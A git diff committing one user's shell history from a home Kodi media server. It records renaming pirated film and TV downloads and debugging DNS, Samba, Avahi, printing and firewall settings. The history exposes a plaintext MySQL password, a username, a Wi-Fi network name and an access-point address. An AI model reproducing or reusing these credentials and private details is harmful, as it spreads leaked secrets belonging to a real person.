+sudo updatedb& +~ +locate ~* +locate *~ +for file in `locate *~`; do sudo rm $file;done +updatedb +sudo updatedb +git status +git add .bash_history .bashrc .kodi/userdata/advancedsettings.xml .kodi/userdata/guisettings.xml .kodi/userdata/sources.xml .viminfo +git commit +git status +sudo updatedb +sudo su +clear +ls +dmesg +clear +tail -f .kodi/temp/kodi.log +lo +sudo ifdown eth0 +sudo apt-get update +sudo apt-get upgrade +sudo apt-get remove --purge thunderbird +sudo apt-get upgrade +clear +s +sudo apt-get autoclean +clear +ls +rm Windows.iso +df -k . +df -h . +du -sk * +ls -l Backups/ +less android/ +ls android/ +pwd +ls +ls android/ +ls samsung/ +du -sk samsung/ +du -sh samsung/ +ls +ls +ls Download/ +clear +ls +ls +dmesg +clear +ls +ls +ls Videos/ +ls Videos/Movies/ +du -sk Templates/ +du -sh Videos/TV/ +ls Public/ +ls Music/ +ls OneDrive/ +du -sk Backups/ +ll +ls OneDrive/ +ll OneDrive/ +ls +ls Downloads/ +ls +mv *.torrent tmp/Torrents/ +ls +ll +clear +ls +la +ls /tmp/ +lo +;s +ls +ls +rm Justice.League.Dark.2017.nfo~ +ls +vim Justice.League.Dark.2017.nfo +mv Justice.League.Dark.2017.nfo "Justice League Dark.nfo" +ls +locate .nfo +locate nfo +locate nfo|less +locate *.nfo|less +locate *.$nfo|less +ls +find ../ -type f -name "*.nfo" -print +less ../Midnight\ in\ Paris\ \(2011\)\ BRRiP\ 1080p\ x264\ DD5.1\ EN\ NL\ Subs/MIDNIGHTinPARIS\ 2011\ 1080p.nfo +find ../ -type f -name "*.nfo" -print +less ../The.Last.Witch.Hunter.2015.HDRip.XViD-ETRG/The\ Last\ Witch\ Hunter-ETRG.nfo +clear +ls +vim Justice\ League\ Dark.nfo +mv Justice\ League\ Dark\ 2017/ Justice\ League\ Dark\ \(2017\) +ls +mv Justice\ League\ -\ Crisis\ on\ Two\ Earths\ 2010/ Justice\ League\ -\ Crisis\ on\ Two\ Earths\ \(2010\) +ls +ls +;3~ +clear +lo +less .kodi/temp/kodi.log +lo +sudo sysctl -p +sudo vim /etc/sysctl.conf +sudo sysctl -p +lo +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +pkill -1 conky +pkill -9 conky +conky& +lo +wiload.sh +o +lo +ls +mv \[TorrentCounter.co\].Thor.Ragnarok.2017.HD-TS.x264/ "Thor Ragnarok (2017)" +ls +clear +s +ls +ls +mv \[TorrentCounter.co\].Thor.Ragnarok.2017.HD-TS.x264.mkv "Thor Ragnarok (2017).mkv" +ls -ltr +ls +mv Thor\ Ragnarok\ \(2017\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +df +lo +sudo ifdown eth0 +sudo ifup eth0 +sudo ifdown eth0 +cat /etc/resolv.conf +nslookup +nslookup xmission.com +nslookup xmission.com +sudo systemctl restart bind9.service +nslookup xmission.com +s +ls +cear +ls +vim /etc/dnsmasq.conf +sudo vim /etc/dnsmasq.conf +ls +cat avahi-daemon +cat console-setup +ls +cat devpts +cat networking +sudo vim networking +ls +rm networking~ +clear +ls +cat nfs-common +clear +ls +cat nss +vim nss +ls +cat ntp +cat ntpdate +ls +cat sysstat +cat useradd +sudo vim useradd +clear +ls +rm useradd~ +ls +lo +pkill -1 kodi +lo +wiload.sh +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +nohup gnome-terminal& +lo +sudo apt-get remove --purge resolvconf +apt-cache search resolv +sudo apt-get remove --purge resolvconf +sudo apt-get install resolvconf +cat /etc/resolv.conf +sudo unlink /etc/resolv.conf +sudo vim /etc/resolv.conf +sudo apt-get install resolvconf +sudo apt-get remove --purge resolvconf +vim /etc/resolv.conf +sudo vim /etc/resolv.conf +sudo unlink /etc/resolv.conf +sudo vim /etc/resolv.conf +nslookup cnn.com +ps aux|grep bind +sudo su - +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +wiload.sh +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +wiload.sh +nslookup cnn.com +nslookup cnn.com localhost +sudo su - +nslookup cnn.com +nslookup cnn.com +sudo vim /etc/resolv.conf +ll /etc/resolv.conf +sudo su- +sudo su - +cat /etc/resolv.conf +sudo vim /etc/resolv.conf +cat /etc/resolv +cat /etc/resolv.conf +dig cnn.com +lo +nohup transmission-gtk & +~ +pkill -9 transmission +lo +vim .bashrc +complete -p |ess +complete -p |less +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +wiload.sh +sudo apt-get update +sudo apt-get upgrade +clear +;s +sudo updatedb * +sudo updatedb & +clear +ls +ls -ll /etc/resolv.conf +cat /etc/resolv.conf +sudo unlink /etc/resolv.conf +sudo cp /etc/resolv.conf~ /etc/resolv.conf +vim /etc/resolv.conf +sudo vim /etc/resolv.conf +nslookup extratorrent.cc +sudo systemctl restart bind9.service +nslookup extratorrent.cc +nslookup extratorrent.cc +cat /etc/resolv.conf +sudo su - +ls +man lp +man lpr +qfg +fg +man lpset +lpoptions --help +lp -d PDF -n 2 .bashrc +ls PDF/ +less PDF/_bashrc.pdf +pdftotext PDF/_bashrc.pdf +less PDF/_bashrc.txt +clear +ls +man wicf +man wicd +less /etc/dhcp/dhclient.conf +ls /etc/dhcp/ +ls /etc/dhcp/dhclient-enter-hooks.d/ +less /etc/dhcp/dhclient-enter-hooks.d/samba +less /etc/samba/dhcp.conf +ls /etc/samba/ +ls /etc/samba/.backups/ +clear +ls +la +ls .cu +ls .android/ +clear +lo +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +wiload.sh +clear +ls +set|less +export|less +man bash +vim .bashrc +man lpr +man lpoptions +man lpr +man lpadmin +man lpinfo +lpinfo +man lpinfo +lpinfo -v +lpinfo cups-pdf +man lpinfo +lpinfo -l cups-pdf +lpinfo -lv +lpinfo -v +man lpinfo +man lpadmin +man lpoptiojs +man lpoptions +lpoption -l +lpoptions -l +ls +lpstat cups-pdf +man lpstat +lpstat -d +lpstat -a PDF +man lpoptions +man lp +clear +ls +rm kodi_crashlog-20171130_194958.log +rm kodi_crashlog-20171201_175049.log +ls +clear +ls +lo +sudo ifup eth0 +lo +nohup gnome-terminal& +lo +nohup gnome-terminal& +lo\\\lo +lo +ls +ls +ls +ls +ls +ls +ls +ls library/ +ls +ls +la +ls +l +ll +ls -ltr +ls +ls addon_data/ +ls +ls Database/ +ls +ls peripheral_data/ +ls +ls playlists/ +ls Thumbnails/ +ls Thumbnails/Video/ +ls +la addons/ +du -sk addons/ +du -sk addons/* +du -sk addons/*|sort -n +ls -al /media/bjohnston/Acer/Users/bjohnston/Videos/Push\ \(2009\)/ +ls -al /media/bjohnston/Acer/Users/bjohnston/Videos/Push\ \(2009\)/Other/ +ls +ls temp/ +ls temp/temp/ +ls temp/scrapers/ +ls temp/scrapers/metadata.local/ +du -sk * +s +ls +ls +du -sk * +ls +ls userdata/ +du -sk userdata/* +ls +su -sk * +du -sk * +ls +ll +ls +ls +ll +ll +ls Video/ +ls Video/Bookmarks/ +ls +ls +ls +ll +less A.River.Runs.Through.It.1992.720p.BluRay.x264.YIFY.nfo +ls +df -k . +df -h . +man rygel.conf +man rygel +ls +ls userdata/ +ls system/ +ls system/python/ +ls system/settings/ +less system/settings/linux.xml +ls +ls system/ +ls system/settings/ +ls system/player +ls system/players/ +ls system/players/dvdplayer/ +ls system/players/dvdplayer/etc/ +ls system/players/dvdplayer/etc/fonts/ +ls system/players/dvdplayer/etc/fonts/conf.d/ +ls +ls media/ +ls +ls addons/ +ls +ls +ls +ls lib/ +ls lib/rygel +ls lib/rygel-2.6/ +ls lib/rygel-2.6/engines/ +locate texturecache.py +sudo systemctl restart smbd +sudo systemctl restart nmbd +lo +ls +ls +ls +ls -ltr +ls lib/ +ls resources/ +less addon.xml +ls +ls +ls -ltr +ls packages/ +ll +du -sk packages/ +ls -ltr +ls metadata.common.imdb.com/ +less metadata.common.imdb.com/imdb.xml +ls +ls -ltr +ls +ls media/ +ls +ls system/ +ls userdata/ +ls +less upnpserver.xml +ls +less sources.xml +ls +lles p +less profiles.xml +ls +less guisettings.xml +ls +less advancedsettings.xml +l +ls +ls Thumbnails/ +ls playlists/ +ls playlists/video/ +ls peripheral_data/ +ls library/ +ls -al library/ +clear +ls +ls keymaps/ +ls addon_data/ +ls +ls -ltr +ls script.artwork.downloader/ +ls script.artwork.downloader/temp/ +less script.artwork.downloader/settings.xml +ls +ls -lytrt +ls =ltr +ls -ltr +ls plugin.video.e +ls plugin.video.exodus/ +ls -ltr plugin.video.exodus/ +ls -ltr plugin.video.exodus/Movies/ +less plugin.video.exodus/settings.xml +ls +ls +ls +ll +rm SALTScache.db +rm saltscache.db +ls +ll +less mig_export_1505684074.csv +ls +ll +less Addons19.db +strings Addons19.db |less +ls +ll +strings MyVideos93.db |less +ls +ls -ltr +date +strings Textures13.db |lss +strings Textures13.db |less +ls -ltr +ls CDDB/ +ls +ls +du -sk * +less favourites.xml +;s +ls +ls library/ +ls profiles.xml +less profiles.xml +ls +less sources.xml +ls +less upnpserver.xml +ls +ls +lsl temp/ +ls temp/ +ll temp/ +ll temp/temp/ +ll temp/scrapers/ +ll temp/scrapers/metadata.themoviedb.org/ +ll temp/scrapers/metadata.local/ +ls +ll +ls scrapers/ +strings commoncache.db +ls +ll +ll media/ +ll sounds/ +ll system/ +ll userdata/ +ls +ls +ls +ls temp/ +ll +less downloadreport.txt +sudo vim /etc/rygel.conf +ls +du -sk * +ls /var/lib/mysql +ls +less upnpserver.xml +ls +sudo iptables -L +ls +less sources.xml +ls +less profiles.xml +ls +less guisettings.xml +ls +du -sk * +ls Thumbnails/ +ls Database/ +ls +ll +ls CDDB/ +less mig_export_1505684074.csv +ls +ll +ls -ltr +mysql -u bjohnston -p localhost +mysql -u bjohnston -p -h localhost +ls +ls +ls +mv The\ Golden\ Compass\ 2007\ 720p\ \[FOXM.TO\]/ The\ Golden\ Compass\ \(2007\) +ls +ls The\ Golden\ Compass\ \(2007\)/ +ls +mv The.Golden.Compass.2007.720p.BluRay.x264-FOXM.mp4 The\ Golden\ Compass\ \(2007\) +ls +mv The\ Golden\ Compass\ \(2007\) The\ Golden\ Compass\ \(2007\).mp4 +ls +mv The\ Golden\ Compass\ \(2007\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ll +ls +ls Tl +ls t +ls Tl +lo +ls +mv True\ Grit\ \(2010\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +wiload.sh +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +nohup gnome-terminal& +lo +lo +nohup gnome-terminal& +lo +cat /etc/resolv.conf +sudo nmap -sT localhost +sudo iptables -L +ls +clear +dmesg +ls +ll +sudo updatedb & +ls +s +ls +mv Minority.Report.2002.720p.BluRay.x264.YIFY.mp4 "Minority Report (2002).mp4" +ll +mv Minority.Report.2002.720p.BluRay.x264.YIFY.srt "Minority Report (2002).srt" +ls +ll +mv Minority\ Report\ \(2002\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +ifconfig +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd +sudo systemctl restart nmbd +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +ls +ls +mv Unforgiven.1992.720p.BrRip.x264.YIFY.mp4 "Unforgiven (1992).mp4" +mv Unforgiven.1992.720p.BrRip.x264.YIFY.srt "Unforgiven (1992).srt" +ls +ll +ls +ll +mv Unforgiven\ \(1992\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lo +ls +mv Annabelle\ Creation\ \(2017\)\ \[YTS.AG\]/ Annabelle\ Creation\ \(2017\)\ +mv Annabelle\ Creation\ \(2017\)\ \[YTS.AG\]/ Annabelle\ Creation\ \(2017\) +;s +ls +ls +ll +nohup gnome-terminal& +lo +ls +ls +less kodi.log +tail -f kodi.log +lo +sudo su - +sudo ifdown eth0 +sudo ifip eth0 +sudo ifup eth0 +avahi-browse -a +wiload.sh +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo systemctl restart bind9.service +nslookup cnn.com localhost +cat /etc/resolv.conf +avahi-discover +avahi-browse -a +mpd --help +mpd -v\ +mpd -v& +vim .config/mpd/mpd.conf +mpd -v& +ps aux|grep mpd +sudo /etc/init.d/mpd start +ps aux|grep mpd +sudo su - +ls +ls +s +ls +git pul +git pull +ls +ls samba.service +less samba.service +avahi-browse --help +avahi-browse -ar +avahi-browse -art +avahi-browse --help +avahi-browse -artp +ls +ll +avahi-browse --help +avahi-browse -artpv +avahi-browse -artv +avahi-browse -artvvv +avahi-browse --help +avahi-browse -artvvvb +avahi-browse -arcvvvb +avahi-browse -b +avahi-browse -bv +avahi-browse --help +avahi-browse -vcr +avahi-browse -avcr +avahi-browse --help +avahi-resolve --gelp +avahi-resolve --help +avahi-publish --help +avahi-browse --help +avahi-browse bv +avahi-browse -bv +lcear +clear +ls +la +less domain.service +;s +ls +less README.md +ls /usr/local/etc/ +ls /usr/share/doc/avahi-utils/ +ls /usr/share/doc/avahi-discover/ +ls /usr/share/doc/avahi-autoipd/ +ls /usr/share/doc/avahi-ui-utils/ +ls /usr/share/avahi/service-types +less /usr/share/avahi/service-types +ls /usr/share/avahi/ +less /usr/share/avahi/avahi-service.dtd +ls /usr/share/avahi/ +ls /usr/share/avahi/interfaces/ +less /usr/share/avahi/interfaces/avahi-discover.ui +ls /usr/share/avahi/interfaces/ +ls /usr/share/avahi/ +l. +sudo su - +lo +sudo apachectl restart +sudo su - +lo +ls +less avahi-service.dtd +tail -f .kodi/temp/kodi.log +CLEAR +clear +ls +ls +less service-types +sudo su - +sudo if down eth0 +sudo ifdown eth0 +sudo ifup eth0 +lo +sudo systemctl restart avahi-daemon.service +ls +ll +ls +ll +ls +ls +ls +ls +less Contents +ls +ll +ls cups-pdf-dispatch-0.1/ +ls +less cups-pdf-dispatch.conf +ls +ls +ll +less cups-pdf-dispatch-ldap.conf +ls +ls +ls +ls +less printer.schema +ls +ls +ls online-docs +ls online-docs/es/ +ls +ls +ls +ls +ls +ls +ls examples/ +less examples/cups-socket.localhost.conf +ls +ls +ls +ls cups-server-common/ +ls cups-ppdc/ +ls +ls templates/ +ls templates/es/ +ls +ls data/ +ls doc-root/ +ls doc-root/es/ +ls drv/ +ls examples/ +ls locale/ +ls locale/es/ +ls +ls mime/ +ls +ls model/ +ls ppd +ls ppdc +ls ppd-updaters/ +ls +ls profiles/ +ls examples/ +la templates/ +ls +ls usb/ +ls +ls backend +file backend/mdns +strings backend/mdns |less +ls +strings smb |lss +strings smb |lsss +strings smb |less +strings mdns |less +ls +strings dnssd |less +ls +strings cups-pdf |less +ll +strings cups-pdf |less +strings ipp|less +ls +ll +sudo su +ls +ls +ll +less Polar.Express.2004.720p.BrRip.x264.YIFY.nfo +ll +ls +ls +ll +less Warcraft.2016.HDRip.XViD-ETRG.nfo +ls +less samba.service +avahi-discover +file /usr/bin/avahi-discover +less /usr/bin/avahi-discover +avahi-browse -avcr + +ls +testparm +ls +find . -type f -name "*service" -print +less etc/systemd/system/teamviewerd.service +ls +less etc/systemd/system/teamviewerd.service +find . -type f -name "*service" -print +less git-repos/avahi-defs/avahi-service-definitions/samba.service +ls +sudo su - +sudo su - +sudo servicectl restart smbd.service +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +testparm -vvvv +sudo su - +srdo ifup eth0 +sudo ifup eth0 +lo +ls +ls The\ Cardigans\ -\ Gran\ Turismo\ \(1998\)\[CBR-320\]/ +mv The\ Cardigans\ -\ Gran\ Turismo\ \(1998\)\[CBR-320\]/ "Gran Turismo" +mkdir "The Cardigans" +mv Gran\ Turismo/ The\ Cardigans/ +ls +xviewer matesio\ image.png +ls Obal/ +ls -a +ls +xviewer CD.jpg +cp Front.jpg ../folder.jpg +ls +ls +ls +ls -al +ls +mv Radiohead\ -\ The\ Bends\ -\ 320kbps/ "The Bends" +mkdir Radiohead +mv The\ Bends/ Radiohead/ +ls +ls +ll +ls +ll +ls +ll +mv Shallow\ Bay_\ The\ Best\ of\ Breaking\ Benjamin/ Shallow\ Bay\ \-\ The\ Best\ of\ Breaking\ Benjamin/ +ll +ls +vim advancedsettings.xml +less guisettings.xml +clear +ls +ll +rm advancedsettings.xml~ +la +rm .advancedsettings.xml.un~ +la +less upnpserver.xml +sudo su - +less .kodi/temp/kodi.log +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +wiload.sh +pkill -1 conky +pkill -9 conky +nohup conky& +lo +pkill -1 conky +pkill -9 conky +nohup conky& +lo +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +sudo systemctl restart avahi-daemon.service +sudo systemctl stop avahi-daemon.service +sudo systemctl start avahi-daemon.service +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo systemctl restart avahi-daemon.service +ls Videos/ +mv Videos/Star\ Trek\ Insurrection\ \(1998\)/ /media/bjohnston/Acer/Users/bjohnston/Videos/ +lw +le +lw +ls +ll +la +ls +xviewer Chris_Hemsworth.jpg +ll +ls +s +ls +ls +mv Stranger\ Things\ Season\ 2\ 720p/ Season\ 2 +mkdir Stranger\ Things +mv Season\ 2/ Stranger\ Things/ +ls Stranger\ Things/ +ls +ls +mv Stranger\ Things/ Stranger\ Things\ \(2017\) +ls +ls +ls +mv *.mkv .. +ls +la +ls +rmdir Season\ 2/ +ls +la +ll +mv Stranger.Things.S02E01.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Stranger Things S02E01.mkv" +ls +ls +mv Stranger\ Things\ \(2017\)/ Stranger\ Things +ll|grep -i stranger +touch Stranger\ Things/ +ll|grep -i stranger +ls /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/ +less /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo +ls +ls +mkdir Stranger\ Things\ S02E01 +ls +mkdir Stranger\ Things\ S02E02 +mkdir Stranger\ Things\ S02E03 +mkdir Stranger\ Things\ S02E05 +mkdir Stranger\ Things\ S02E06 +mkdir Stranger\ Things\ S02E07 +mkdir Stranger\ Things\ S02E08 +mkdir Stranger\ Things\ S02E09 +mv Stranger\ Things\ S02E01.mkv Stranger\ Things\ S02E01 +mv Stranger\ Things\ S02E02/ Stranger\ Things\ S02E02 +mv Stranger.Things.S02E02.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E02 +mv Stranger.Things.S02E03.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E02 +mv Stranger.Things.S02E04.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E04 +mv Stranger.Things.S02E05.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E05 +mv Stranger.Things.S02E06.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E06 +mv Stranger.Things.S02E07.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E07 +mv Stranger.Things.S02E08.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E08 +mv Stranger.Things.S02E09.720p.WEB.DL.x264-\[tvbeasts.com\].mkv Stranger\ Things\ S02E09 +ls +ls +ll +du -sk * +ls Stranger\ Things\ S02E02 +ls +mv Stranger.Things.S02E03.720p.WEB.DL.x264-\[tvbeasts.com\].mkv ../Stranger\ Things\ S02E03 +ll +ls +ll +ls +du -sk * +ll Stranger\ Things\ S02E03 +ll Stranger\ Things\ S02E04 +ll Stranger\ Things\ S02E05 +ll Stranger\ Things\ S02E06 +ls +head -2 /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo +head -3 /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo +head -3 /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo > "Stranger Things.nfo" +vim Stranger\ Things +vim Stranger\ Things.nfo +kess /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo > "Stranger Things.nfo" +less /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo > "Stranger Things.nfo" +less /media/bjohnston/Acer/Users/bjohnston/Videos/Star\ Trek\ \(2009\)/Star.Trek.2009.720p.BrRip.x264.YIFY.nfo +lo +vim Stranger\ Things.nfo +ls +rm Stranger\ Things.nfo~ +rm .Stranger\ Things.nfo.un~ +la +ls +less Stranger\ Things +less Stranger\ Things.nfo +vim Stranger\ Things.nfo +ls +rm Stranger\ Things~ +rm Stranger\ Things.nfo~ +rm .Stranger\ Things.nfo.un~ +la +less Stranger\ Things.nfo +vim Stranger\ Things.nfo +rm Stranger\ Things.nfo~ +rm .Stranger\ Things.nfo.un~ +la +cat Stranger\ Things.nfo +ls +mv Stranger\ Things\ S02E01.mkv "Chapter One: MADMAX.mkv" +ls +ls +mv Stranger.Things.S02E02.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Two: Trick or Treat, Freak.mkv" +ll +ls +mv Stranger.Things.S02E03.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Three: The Pollywog.mkv" +ls +mv Stranger.Things.S02E04.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Four: Will the Wise.mkv" +ll +ls +mv Stranger.Things.S02E05.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Five: Dig Dug.mkv" +ls +ll +mv Stranger.Things.S02E06.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Six: The Spy.mkv" +ls +ls +mv Stranger.Things.S02E07.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Seven: The Lost Sister.mkv" +mv Stranger.Things.S02E08.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Eight: The Mind Flayer.mkv" +ll +ll +mv Stranger.Things.S02E09.720p.WEB.DL.x264-\[tvbeasts.com\].mkv "Chapter Nine: The Gate.mkv" +ll +ls +ll +ls +ls +mkdir Season\ 2 +ls +ls +mv Chapter\ One\:\ MADMAX.mkv ../Season\ 2/ +ls +ls +ls +mv Chapter\ One\:\ MADMAX.mkv S02E01-Chapter\ One\:\ MADMAX.mkv +ll +mv ../Stranger\ Things\ S02E02/Chapter\ Two\:\ Trick\ or\ Treat\,\ Freak.mkv . +ls +mv Chapter\ Two\:\ Trick\ or\ Treat\,\ Freak.mkv S02E02-Chapter\ Two\:\ Trick\ or\ Treat\,\ Freak.mkv +ll +mv ../Stranger\ Things\ S02E03/Chapter\ Three\:\ The\ Pollywog.mkv . +ls +ll +mv Chapter\ Three\:\ The\ Pollywog.mkv S02E03-Chapter\ Three\:\ The\ Pollywog.mkv +l; +ll +ll +ll ..|grep -i strang +touch ../Stranger\ Things/ +ll ..|grep -i strang +ls +ls +ll +mv ../Stranger\ Things\ S02E04/Chapter\ Four\:\ Will\ the\ Wise.mkv . +mv Chapter\ Four\:\ Will\ the\ Wise.mkv S02E04Chapter\ Four\:\ Will\ the\ Wise.mkv +ll +mv S02E04Chapter\ Four\:\ Will\ the\ Wise.mkv S02E04-Chapter\ Four\:\ Will\ the\ Wise.mkv +ll +mv ../Stranger\ Things\ S02E05/Chapter\ Five\:\ Dig\ Dug.mkv . +mv Chapter\ Five\:\ Dig\ Dug.mkv S02E05-Chapter\ Five\:\ Dig\ Dug.mkv +ll +mv ../Stranger\ Things\ S02E06/Chapter\ Six\:\ The\ Spy.mkv . +mv Chapter\ Six\:\ The\ Spy.mkv S02E06-Chapter\ Six\:\ The\ Spy.mkv +mv ../Stranger\ Things\ S02E07/Chapter\ Seven\:\ The\ Lost\ Sister.mkv . +ll +mv Chapter\ Seven\:\ The\ Lost\ Sister.mkv S02E07-Chapter\ Seven\:\ The\ Lost\ Sister.mkv +ll +mv ../Stranger\ Things\ S02E08/Chapter\ Eight\:\ The\ Mind\ Flayer.mkv . +mv Chapter\ Eight\:\ The\ Mind\ Flayer.mkv S02E08-Chapter\ Eight\:\ The\ Mind\ Flayer.mkv +mv ../Stranger\ Things\ S02E09/Chapter\ Nine\:\ The\ Gate.mkv . +mv Chapter\ Nine\:\ The\ Gate.mkv S02E09-Chapter\ Nine\:\ The\ Gate.mkv +ll +ll +rmdir Stranger\ Things\ S02E0[19] +ls +ll +ls -al Stranger\ Things\ S02E02/ +pkill -1 conky +pkill -9 conky +nohup conky & +lo +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +clear +ls +s +ls +ls +rmdir Stranger\ Things\ S02E0[19] +ls +rmdir Stranger\ Things\ S02E0[29] +ls +rmdir Stranger\ Things\ S02E0[3-9] +;s +ls +ll +rm nohup.out +ls +ll +la +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +ps aux|grep kodi +lo +sudo ifdown eth0 +sudo ifup eth0 +sudo systemctl restart avahi-daemon.service +mysql -u bjohnston -h localhost +mysql -u bjohnston -p -h localhost +mysqldump --help +mysqldump -acv -u bjohnston -p -h localhost MyVideos93 +mysqldump -acv -u bjohnston -p -h localhost MyVideos93 > MyVideos93.sql +bljn1285 +rm MyVideos93.sql +mysqldump -acv -u bjohnston -p -h localhost MyVideos93 > MyVideos93.sql +rm MyVideos93.sql +mysqldump -acv -u bjohnston -p bljn1285 -h localhost MyVideos93 > MyVideos93.sql +mysqldump --help +mysqldump -acv -u bjohnston --password=bljn1285 -h localhost MyVideos93 > MyVideos93.sql +rm MyVideos93.sql +mysqldump -acv -u bjohnston --password=bljn1285 -h localhost MyVideos93 > MyVideos93.sql +ll +less MyVideos93.sql +ls +mysql -u bjohnston -p -h localhost +ls +ls +ls +ls +ls userdata/ +ls userdata/Thumbnails/ +ls userdata/Thumbnails/0 +ls userdata/Thumbnails/0 -s +ls userdata/Thumbnails/0 -l +ls userdata/Thumbnails/1 -l +ls userdata/Thumbnails/ +ls userdata/Thumbnails/f -l +d +sduo su - +sudo su - +lo +sudo su - +lo +sudo /etc/init.d/bind9 stop +clear +ls +lo +sudo su - +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +sudo iwscan +sudo iwlist +sudo iwlist wlan0 ap +sudo iwlist wlan0 scanning +sudo ifconfig wlan0 down +sudo ifdown eth0 +sudo ifup eth0 +sudo pkill -9 dhclient +sudo /etc/init.d/bind9 start +sudo systemctl restart avahi-daemon.service +pkill -1 kodi +clear +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo systemctl restart avahi-daemon.service +s +ls +cat hosts +ls +ll +less avahi-daemon.conf +sudo vim hosts +sudo vim avahi-daemon.conf +sudo systemctl restart avahi-daemon.service +tail -f .kodi/temp/kodi.log +sudo su - +pkill -1 kodi +clear +ls +rm kodi_crashlog-20171203_091407.log +clear +ls +less idea.properties +ls Android/ +ls Android/Sdk/ +fg +clear +ls +du -sh .. / +du -sh ../ +sudo cp .config/conky ../guest/.config/ +sudo cp -ra .config/conky ../guest/.config/ +sudo suk - +sudo su - +h +h|grep ipta +sudo iptables -F +ifconfig +roiute +ifconfig +sudo iwconfig wlan0 essid "Lct4vets" mode Managed channel 10 ap 14:91:82:F6:2B:1F +sudo ifdown eth0 +sudo ifup eth0 +lo +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +sudo tdbtool /var/lib/samba/wins.tdb +sudo systemctl restart smbd.service +sudo systemctl restart nmbd.service +lo +iptables -L +sudo iptables -L +sudo iptables-restore < /etc/iptables/rules.v4 +iptables -L +sudo iptables -L +sudo sysctl -p +ls +ls +ll +file Star\ Trek\ -\ Harlan\ Ellison\'s\ The\ City\ On\ The\ Edge\ of\ Forever\ The\ Original\ Teleplay\ \(2015\)\ \(digital\)\ \(The\ Magicians-Empire\).cbr +ls +ll +clear +ls +mv Star\ Trek\ -\ Harlan\ Ellison\'s\ The\ City\ On\ The\ Edge\ of\ Forever\ The\ Original\ Teleplay\ \(2015\)\ \(digital\)\ \(The\ Magicians-Empire\).cbr Star\ Trek\ -\ Harlan\ Ellison\'s\ The\ City\ On\ The\ Edge\ of\ Forever\ The\ Original\ Teleplay\ \(2015\)\ \(digital\)\ \(The\ Magicians-Empire\).rar +mv Star\ Trek\ -\ Harlan\ Ellison\'s\ The\ City\ On\ The\ Edge\ of\ Forever\ The\ Original\ Teleplay\ \(2015\)\ \(digital\)\ \(The\ Magicians-Empire\).rar "Start Trek.rar: +mv Star\ Trek\ -\ Harlan\ Ellison\'s\ The\ City\ On\ The\ Edge\ of\ Forever\ The\ Original\ Teleplay\ \(2015\)\ \(digital\)\ \(The\ Magicians-Empire\).rar "Start Trek.rar" +ll +unrar "Start Trek.rar" +ll +ls -l +ls -lh +rm Start\ Trek.rar +ls +clear +s +ls +ping +ping +pkill -9 conky +nohup conky & +lo +sudo ifdown eth0 +clear +ls +lo +sudo su - +sudo iptables -L -n --line-numbers +g\h +h +sudo nmap -sT localhost +sudo iptables -L -n --line-numbers +sudo ifupb eth0 +sudo ifup eth0 +lo +wiload.sh +lo +sudo tdbtool 